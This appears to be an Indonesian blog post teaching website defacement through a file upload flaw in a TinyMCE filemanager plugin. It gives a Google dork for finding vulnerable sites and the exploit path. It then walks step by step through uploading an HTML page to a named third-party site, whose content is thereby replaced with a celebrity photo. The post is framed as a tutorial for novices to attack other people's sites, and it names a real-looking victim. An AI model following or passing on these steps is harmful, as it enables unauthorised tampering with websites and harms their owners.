CMS Webconstructor File Upload Vulnerability

Kali ini saya akan share teknik deface yang kemarin saya dapat dari bang ENno. Tekniknya cukup mudah terutama bagi yang newbie culun seperti saya. :v

Oke, langsung saja.
Bahan :
  • Google Dork : inurl:tiny_mce/plugins/filemanager [untuk dork lain silahkan dikembangkan sendiri]
  • Exploit : [localhost]/PATH/tiny_mce/plugins/filemanager/insertfile/insert_file.php

Sekarang kita mulai prakteknya.
  1. Buka google dan cari target dengan dork diatas.
  2. Sebagai contoh saya pilih http://rofel.pl/tiny_mce/plugins/filemanager/
  3. masukkan exploitnya sehingga menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
  4. Upload filenya. Sebagai contoh saya upload file dengan nama suram.html
  5. Jika upload sukses, maka kalian akan melihat alamat filenya di bawah. Yaitu di http://rofel.pl/upload/suram.html
  6. Dan sekarang, foto nabilahJKT48 sudah terpasang di web tersebut. :v

Ekstensi file yang adpat diupload adalah html, pdf, txt, doc, jpg . Tidak support file .php sehingga tidak bisa upload shell.
CMS Webconstructor File Upload Vulnerability
Thanks to : ENNo Area
Shares
Tags:

21 Comments

Leave a Reply